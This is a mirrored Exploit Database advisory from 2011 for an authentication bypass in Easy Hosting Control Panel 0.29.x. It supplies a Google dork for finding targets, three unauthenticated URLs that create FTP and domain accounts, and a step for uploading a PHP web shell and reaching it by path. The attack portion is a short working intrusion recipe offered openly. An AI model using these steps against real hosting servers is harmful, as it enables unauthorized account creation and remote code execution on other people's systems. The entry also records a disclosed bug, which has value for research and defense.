Easy Hosting Control Panel – Admin Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： Jasman
  日期： 2011-10-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17926/

• # Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
  # Google Dork: inurl:/ehcp/?op=applyfordomainaccount
  # Date: 10/04/2011
  # Author: Jasman
  # Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
  # Version: 0.29.10 - 0.29.13
  # Tested on: Ubuntu, Debian
  
  
  + Description
  Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
  It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional
  
  
  + Vulnerable:
  to add a ftp account & domain does not require a login.
  
  http://site.com/vhosts/ehcp/?op=applyforaccount
  http://site.com/vhosts/ehcp/?op=applyforftpaccount
  http://site.com/vhosts/ehcp/?op=applyfordomainaccount
  
  + Exploit 
  upload a shell via ftp
  http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php
  
  + Tested On
  0.29.13
  0.29.11
  0.29.10
  
  
  + Other Link:
  https://bugs.launchpad.net/ehcp/+bug/865889
  
  
  + Thank to:
  ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng, 
  aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
  Exploit-Id, FeeLcoMz All Indonesian Hacker